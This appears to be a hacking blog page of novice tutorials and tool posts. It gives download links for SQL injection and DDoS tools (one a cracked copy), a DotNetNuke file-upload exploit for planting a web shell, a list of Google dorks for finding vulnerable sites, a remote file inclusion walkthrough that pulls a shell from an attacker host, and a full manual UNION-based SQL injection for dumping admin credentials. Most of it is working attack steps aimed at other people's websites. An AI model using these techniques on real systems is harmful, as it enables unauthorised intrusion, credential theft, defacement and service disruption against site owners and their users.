THE MOLE | AUTOMATIC SQL INJECTION TOOL | SQLI EXPLOITATION

 

The Mole - is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the screwed up site, it can detect the type of  injection and exploit it, either by using the union technique or a boolean query based technique.

 

Features

• Command line interface. Different commands trigger different actions.

• Support for injections using Mysql, SQL Server, Postgres and Oracle databases.

• Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.

• Developed in python 3.

• Auto-completion for commands, command arguments and database, table and columns names.

DOWNLOAD

Windows: themole-0.2.6-win32.zip
Linux: themole-0.2.6-lin-src.tar.gz

Complete Tutorial : Click here

 

Read More | comments

LOIC (Low Orbit Ion Cannon) | DOS | DDOS TOOL

LOIC (Low Orbit Ion Cannon) - named after a fictional weapon in the Command & Conqurer series of video games, is an open source network stress testing application, written in C#. LOIC performs a denial-of-service (DoS) attack or when used by multiple individuals, a Ddos (Distributed Denial Of Service) on a target site by flooding the server with TCP , UDP  or HTTP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.

 

Note  that i shall NOT be held responsible for your actions undertaken with the help of this tool.

WARNING: This is a very deadly tool, so please read the this sites disclaimer before using it. And  DO NOT attack from your computer because once you are traced? Only hell knows you are on your own, use it wisely :P:P:P

DOWNLOAD LOIC

http://www.mediafire.com/?s407uyr40ayhvx1

Mediafire Password: code7

Read More | comments

HACK WEBSITE USING DotNetNuke (DNN) | PORTAL HACKING

Portal Hacking (DNN) - Is a type of website hacking technique that uses google to search for DNN vulnerable or hackable site. This is done with the help of google dorks. That is why it is known that google is one of the cyber elements that make a hackers job easier.

How to hack using (DNN)

• Go to www.google.com

• In the google search box, type the following dork;

:inurl:/tabid/36/language/en-US/Default.aspx

The above dork is simply used to search for a DNN vulnerable site. see the image below;

• Now let say that we have found a vulnerable site like; (just an example)

www.site.com/Home/tabid/36/Lan...S/Default.aspx

 All you have to do is modify the vulnerable url by replacing;

/Home/tabid/36/Lan...S/Default.aspx

with this;

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

So that you will have something that looks like this;

www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

• Now enter the modified url in address bar and hit Enter! You will get the link gallary

•  Now on the ''link type'' menu select ''File'' and then replace the url in your browser's address bar with the following script and hit Enter!

  javascript:__doPostBack('ctlURL$cmdUpload','')

An ''upload'' option should appear on the link gallary menu as shown bellow;

•  Now Upload your shell c99,c100, r57 etc ...... and its game over!!!  

Shells are a malicious PHP files which you will need to upload to any website, and once you execute it you will get access to its server directly WITHOUT authenticating your self. With a help of a shell you can easily remove/edit/replace files,. in shot taking over the server as if you where the admin :P

Read More | comments

HOW TO HACK A WEBSITE BY SQL INJECTION USING HAVIJ | TUTORIAL

You can download Havij here

After downloading and installing Havij SQL tool,. you have to find an SQL vulnerable site. This can be done by the use of google dorks like

• inurl:index.php?id=sql under''

Read this tutorial on manual sql under   '' searching for the vulnerability ''   here ...

but for an easy go, you can just use another automated program known as sql poison . you can download  here. The main aim of sql poison scanner is to help you find a vulnerable web page by performing an automated blind search onto a search engine like google. Havij will only hack a website through a specific webpage which you know is vulnerable to sql injection.

-----------------------------------------------------------------------------------------------------------------

Now lets say that you have found a vulnerable weblink url which looks like this one:

• http://www.hackyourdad.com/hisoffice.php?id=282

1. Open havij, then copy and paste the vulnerable weblink as shown in figure

2. Now click in the "Analyze" button

4. After u click Analize, wait for it to find it's vulernable, type of injection, if db server is mysql and it will find database name. Then after get it's database is name like xxxx_xxxx

5. Then go to the next operation of finding tables by clicking "tables" . A sub menu will appear  where you         will click "Get tables"  as shown in the figure below. Your may need to wait for a while before it shows         you the tables

6. After you get the tables ,there will be a check box for "users" Put mark on it and click on the " get columns " tab as shown in figure

7. Under ''Get columns'' list,.. just check on username and password and click on "Get data"

8. Bingo!!! Now you have the Username and password that may be for the admin...The pass that you will get     will be in form of an md5 hash which you will have to decrypt it by using the MD5 decryptor tool as shown below

After you have got the Username & the password ready,.. You now need to find the Admin page which will give you access to the control panel (cpanel) of the website.
To find the Admin page, Go to ''Find Admin'' , then enter the site url on ''Path to search'' and click on ''Start'' as shown in the image below

Now get the admin page url and open it in your internet browser,.. it will take you to a page which will request for the username and password,.. Enter these details & its Game Over!!! 

You will find yourself in the control panel (cpanel) where you will have complete control of the website, you can do whatever the hell you want, you can even deface the website if you are realy in a bad mood :P

Read More | comments

HACKING EXTENSION FOR FIREFOX (XSS Me)

Cross-Site Scripting (XSS) is a common flaw found in todays web applications. XSS flaws can cause serious damage to a web application. Detecting XSS vulnerabilities early in the development process will help protect a web application from unnecessary flaws. XSS-Me is the Exploit-Me tool used to test for reflected XSS vulnerabilities.

DOWNLOAD

https://addons.mozilla.org/en-US/firefox/addon/7598/ 

Read More | comments

HAVIJ SQL INJECTION TOOL | FULL VERSION CRACK

Havij is an automated SQL Injection tool that helps penetration testers to search and find SQL vulnerabilities on a web page.

 By taking advantage of an SQL vulnerable web application, a user can use this software to perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

Compared to other SQL vulnerability scanners, Havij has a 95% success rate and has a very friendly user interface which makes it easier for every noob hacker to use.



 What's New?

•  Oracle error based database added with ability to execute query.

• Getting tables and column when database name is unknown added (mysql)

• Another method added for finding columns count and string column in PostgreSQL

• Automatic keyword finder optimized and some bugs fixed.

• A bug in finding valid string column in mysql fixed.

•  'Key is not unique' bug fixed

• Getting data starts from row 2 when All in One fails - bug fixed

• Run time error when finding keyword fixed.

• False table finding in access fixed.

• keyword correction method made better

• A bug in getting current data base in mssql fixed.

• A secondary method added when input value doesn't return a normal page (usually 404 not found)

• Data extraction bug in html-encoded pages fixed.

• String or integer type detection made better.

• A bug in https injection fixed.

You can go through the Tutorial of SQL injection with Havij from Here

DOWNLOAD

http://www.mediafire.com/?eg1bo9lhxlyerid

Read More | comments

LIST OF GOOGLE DORKS FOR SQL INJECTION

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:roduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:gl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:pinions.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:articipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:rod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:erson.php?id=
inurl:roductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:rofile_view.php?id=
inurl:category.php?id=
inurl:ublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:rod_info.php?id=
inurl:shop.php?do=part&id=
inurl:roductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:roduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:roduit.php?id=
inurl:op.php?id=
inurl:shopping.php?id=
inurl:roductdetail.php?id=
inurl:ost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:age.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:roduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:read.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl;roduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:pinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:ffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id

Read More | comments

DOWNLOAD LFI SCANNER SCRIPT

This is a Simple Local File Inclusion Vulnerability Scanner helps you to find LFI vulnerabilities.
This tool is only able to handle “simple” LFI vulnerabilities and not complex ones.

Usage:
./lfi_scanner.py –url=


Usage example:
./lfi_scanner.py –url=”http://www.example.com/page.php?file=mai

DOWNLOAD

http://www.xenuser.org/tools/lfi_scanner.py 

Read More | comments

HOW TO HACK A WEBSITE BY ''REMOTE FILE INCLUSION'' (RFI)

Remote File Inclusion ( RFI ) allows an attacker to upload his file on a website server using a script. RFI is a common vulnerability found in many websites. Using RFI you can literally deface a websites and get complete access to the server. In this tutorial, i'll try to make it as simple as possible.. (Noob Friendly)

1. Searching for RFI vulnerability


The valnerability is ussually found in websites that have a url navigation that is similar to;

• www.victimwebsite.com/index.php?page=something

This can be found by the use of google dorks.. e.g inurl:index.php?page=

2. Testing for RFI vulnerability

After targeting a website, you need to make sure that its realy vulnerable to this type of attack by testing using:

• www.victimwebsite.com/index.php?page=http://www.google.com/?

Press enter and if the google home page appears instead of the victim's website, then it is vulnerable to RFI

3. Gaining Access to the server

Now you need to execute your own script on the victim's webserver with the help of a shell. Shells are scripts that allow a hacker to view directories of a server, viewing files, deleting files and letting you run commands.

DOWNLOAD SHELL: http://www.mediafire.com/file/d6jafoo2iafsaj4/shell.php

Now upload the shell to any webhost (hacker's website) and get the url of that
e.g    www.hackerwebsite.com/shell.txt

You need to upload the shell as a text file (shell.txt) instead of shell.php. The reason is that if you upload it as ''shell.php'', its going to execute on the hacker's website instead of the victim's website,. get my point?

Now you need to hook up your victim's server to your shell by replacing the google url with your shell url so that it looks like this;

 www.victimwebsite.com/index.php?page=http://hackerwebsite.com/shell.txt

Hit enter!!! and its game over.... you have complete access to the victim's server and you can do anything with it... :P

 The above image shows how your shell window would look like after you have successfully hacked into a website.

Read More | comments

DENIAL OF SERVICE (DOS Attacks)

Denial of service (DoS) attack is a type of a hacker attack that clogs up so much memory on the target system that it can not serve it's users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users.There are several different kinds of dos attacks as discussed below:

1. Ping Of Death : The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim.The Ping command makes use of the ICMP echo request and echo reply messages and it's commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so the attacker uses, the ping command in conjuction with -l argument (used to specify the size of the packet sent) to ping the target system that exceeds the maximum bytes allowed by TCP/IP (65,536).

example:- c:/>ping -l 65540 hostname

Fortunately, nearly all operating systems these days are not vulnerable to the ping of death attack.

2. Teardrop Attack : Whenever data is sent over the internet, it is broken into fragments at the source system and reassembled at the destination system. For example you need to send 3,000 bytes of data from one system to another. Rather than sending the entire chunk in asingle packet, the data is broken down into smaller packets as given below:

• packet 1 will carry bytes 1-1000.

• packet 2 will carry bytes 1001-2000.

• packet 3 will carry bytes 2001-3000.

In teardrop attack, however, the data packets sent to the target computer contais bytes that overlaps with each other.
(bytes 1-1500) (bytes 1001-2000) (bytes 1500-2500)
When the target system receives such a series of packets, it can not reassemble the data and therefore will crash, hang, or reboot.
Old Linux systems, Windows NT/95 are vulnerable.

3. SYN - Flood Attack : In SYN flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each        one with a SYN/ACK packet but as all the source IP addresses are invalid the target system goes into wait state for ACK message to receive from source. Eventually, due to large number of connection requests, the target systems' memory is consumed. In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.

4. Land Attack : A land attack is similar to SYN attack, the only difference being that instead of including an invalid IP address, the SYN packet include the IP address of the target sysetm itself. As a result an infinite loop is created within the target system, which ultimately hangs and crashes.Windows NT before Service Pack 4 are vulnerable to this attack.

5. Smurf Attack : There are 3 players in the smurf attack–the attacker,the intermediary (which can also be a victim) and the victim. In most scenarios the attacker spoofs the IP source address as the IP of the intended victim to the intermediary network broadcast address. Every host on the intermediary network replies, flooding the victim and the intermediary network with network traffic.
Result:- Performance may be degraded such that the victim, the victim and intermediary networks become congested and unusable, i.e. clogging the network and preventing legitimate users from obtaining network services.

6. UDP - Flood Attack : Two UDP services: echo (which echos back any character received) and chargen (which generates character) were used in the past for network testing and are enabled by default on most systems. These services can be used to launch a DOS by connecting the chargen to echo ports on the same or another machine and generating large amounts of network traffic.

Read More | comments

WEBSITE HACKING USING SQL INJECTION (Manually)

SECTION 1 - Searching for the vulnerability

inurl:buy.php?id=

This will be inputted into a search engine and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found the page that looks like this

http://www.site.com/buy.php?id=1

In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:

http://www.site.com/buy.php?id=1'
or
http://www.site.com/buy.php?id='1

After pressing enter, if this website should return an error such as the following:

• Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7

Or something along those lines, this means it's vulnerable to injection.

In some cases where you are to find a website such as this:

http://www.site.com/buy.php?id=1&dog;catid=2

Then you must use the same technique with adding a ' except it must be between the value (in this case the number) and the operator (the "=" sign) so it looks like this:

http://www.site.com/buy.php?id='1&dog;catid='2

There are programs that will do this for you but to start off I would suggest simply to do things manually, using Google, and so I won't post any for you guys. If you feel so compelled to use one anyways. I recommend the Exploit Scanner by Reiluke.

SECTION 2 - Determining the amount of columns

In order for us to be able to use commands and get results we must know how many columns there are on a website. So to find the number of columns we must use a very complex and advanced method that I like to call "Trial and Error" with the ORDER BY command

• NOTE: SQL does not care whether or not your letters are capitalized or not and I'm just doing it out of clarity, for all it cares your queries could look like this:

http://www.site.com/buy.php?id=-1 CaN I HaZ TeH PaSSwOrDs? PLz aNd ThX

IT DOESN'T MATTER (btw please don't think that was an actual command).

So back to the ORDER BY command. To find the number of columns we write a query with incrementing values until we get an error, like this:

http://www.site.com/buy.php?id=1 ORDER BY 1-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 2-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 3-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 4-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 5-- <---ERROR!

This means that there are FOUR columns!

DON'T FORGET TO INCLUDE THE DOUBLE NULL (--) AFTER THE QUERY.
VERY IMPORTANT!

SECTION 3 - Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we use the UNION and SELECT queries while keeping the double null (--) at the end of the string. There is also one other difference that is small in size but not in importance, see if you can spot it.

http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4--

If you couldn't spot the difference, it's the extra null in between the "=" sign and the value (the number). buy.php?id=-1

Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4 because it really is a guessing game and for the kind of sites that are still using it, it's not worth your time.

If we look back to the end of Section Three in Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2). The command should look like   this:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

• NOTE: If this method must be used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines: 5.1.47-community-log which is the version of SQL for the website.

• NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Finding the database
Finding the name of the database is not always a necessary step to take to gather the information that you want, however in my experience folllowing these steps and finding the database may sometimes lead to a higher success rate.

To find the database we use a query like the one below:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,concat(database()),3,4--

Welldone hacker! You now have the name of the database! Copy and paste the name somewhere safe, we'll need it for later.

The Good Stuff
This is the fun part where we will find the usernames, emails and passwords!

• Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so I'll try to explain. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st

You now have all the table names!

Finding the column names
Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial).

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
    Hex/Char Converter

• Spoiler (Click to View) http://www.swingnote.com/tools/texttohex.php

3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Displaying the column contents
We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon (:) which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to the last section

Finding the admin page
Usually the admin page will be directly off of the site's home page, here are some examples:

http://www.site.com/admin
http://www.site.com/adminlogin
http://www.site.com/modlogin
http://www.site.com/moderator

Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!

Read More | comments